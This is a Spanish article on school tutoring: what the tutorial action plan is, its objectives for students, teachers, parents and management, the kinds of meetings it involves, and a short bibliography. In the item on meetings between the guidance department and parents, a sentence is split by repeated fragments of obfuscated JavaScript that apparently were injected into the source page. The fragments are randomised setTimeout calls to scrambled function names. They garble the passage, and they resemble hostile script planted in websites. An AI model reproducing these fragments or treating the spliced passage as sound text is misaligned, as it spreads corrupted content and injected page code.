¿EXISTE LA TUTORÍA COMO TAL?

Autora: Mª Teresa Vivas Martín.

Seguro que hay padres que dudan de la existencia de la tutoría y para qué sirve. Al mismo tiempo existen profesores que no cumplen sus horas de tutoría y que sin darse cuenta afecta de manera negativa al proceso de enseñanza-aprendizaje. Todos debemos saber qué es la tutoría y que existe un documento en el centro que nos ayuda a entender y resolver todas las dudas que nos puedan surgir sobre este tema.

La tutoría es un elemento presente en  la función docente y en el curriculum. Por ello entendemos  que todo profesor está implicado en la acción tutorial, independientemente de si es tutor o no de un grupo. La relación entre profesor‑alumno no ha de ser solo por medio del conocimiento sino también por la enseñanza de valores, normas y actitudes, según propone el Diseño Curricular Base, donde la acción del plan tutorial es algo fundamental.

Los contenidos  desarrollados en el aula, las dificultades de aprendizaje, las relaciones entre profesor y alumnos, no sólo van a determinar los resultados tradicionalmente académicos sino que van a configurar, además, el fondo de experiencias a partir del cual el alumno construye su autoconcepto, elabora sus expectativas, percibe sus limitaciones y afronta su desarrollo personal y su proyecto de vida en un marco social.

Por otra parte, la acción docente no se ejerce sólo en relación con el grupo de alumnos. La familia es una referencia importante a la hora de solucionar un problema con un alumno y por ello se establecen horas de tutoría para tratar cualquier tipo de problemas que puedan surgir dentro y fuera del centro. Todo esto hace que  las experiencias escolares y extraescolares puedan ser integradas progresivamente, convirtiéndose en elementos de referencia de proyectos de vida cada vez más autónomos.

Como hemos dicho anteriormente la tutoría es algo que compete a todo profesor, al equipo docente y a la institución escolar en su conjunto, por ello es necesario acabar con el sentido contrario que se tiene de la acción tutorial y así entenderla como algo que nos ayuda a  formar al alumno para ser un bien ciudadano y ayudarle a plantear su futuro, verla como un compromiso colectivo con la educación y orientación de los alumnos.

B) OBJETIVOS

Los objetivos que se quieren alcanzar dependerán del grupo de personas en cuestión. Se entiende que en plan de acción tutorial están involucrados diferentes actores que pertenecen al centro directa o indirectamente como: alumnos, padres, profesores, directores, orientadores, tutores etc. Por ello los objetivos son diferentes para cada grupo.

Para los alumnos los objetivos son:

  • Facilitar la integración del alumnado en el centro y en el grupo.
  • Contribuir a la personalización de los procesos de enseñanza y aprendizaje.
  • Efectuar un seguimiento de los procesos de aprendizaje de los alumnos con el fin de detectar las dificultades y las necesidades especiales que puedan presentarse.
  • Elaborar respuestas educativas ajustadas a las necesidades del alumnado
  • Orientar al alumno en su futuro académico.
  • Fomentar en el grupo el desarrollo de actitudes participativas y cooperativas en el centro y en su entorno socio-cultural.

Para el equipo docente:

  • Adaptar la programación a aquellos alumnos que lo necesiten
  • Hacer las evaluaciones y llevar a acabo el estudio individualizado de cada alumno.
  • Reuniones periódicas el tutor con el resto de profesores desde el departamento de orientación.

Para los padres y madres:

  • Crear una buena relación entre los padres y el centro.
  • Informar, orientar y ayudar a los padres en todo lo que pueda afectar en la educación de sus hijos.

Para el equipo directivo:

  • Disponer de todo el material posible para llevar las actividades tutoriales a la práctica.
  • Hacer ver el PAT como algo beneficioso para todos.
  • Hacer una organización del PAT en el centro, horarios establecidos para cada tutor.
  • Llevar a cabo una evolución del PAT en el centro.

D) FUNCIONES DE LOS MIEMBROS DEL CENTRO

Se organizarán reuniones a cada cierto tiempo mientras más elevado sea el curso más tiempo pasará para la siguiente reunión.

Las reuniones podrán ser entre:

  1. Departamento de orientación –Tutor

En estas reuniones se expondrán los problemas que hayan podido surgir en el aula (problemas de conducta, faltas de asistencia…); propuestas para las sesiones siguientes; ruegos y preguntas, etc.

  1. Tutor –alumno

Los tutores tendrán una hora de tutoría en el calendario semanal y atenderán a los alumnos en grupos o individualmente.

  1. Tutor- jefatura de estudios

El jefe de estudios coordina y hace el seguimiento del PAT y convoca a los tutores a la hora de la tutoría.

  1. Tutor- equipo educativo

Se organizarán de forma extraordinaria. El tutor aclarará temas con los demás profesores que imparten clase a su grupo para solventar problemas como por ejemplo una bajada del rendimiento académico.

  1. Departamento de orientación –Padres.

Siempre contandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando con el tutor el orientador del centro se entrevistará con los padres que lo soliciten para aclarar posibles problemas como trastornos alimenticios, de conducta, etc.

E) BIBLIOGRAFÍA

EPOE (1987): Técnicas de Acción Tutorial. Córdoba: EPOE de Córdoba

POAT I.E.S “Santiago Apóstol” Almendralejo.

http://www.educa.madrid.org/web/cp.juangris.madrid/Documentos%20pdf%2007-08/PLAN%20DE%20ACCI%D3N%20TUTORIAL.pdf

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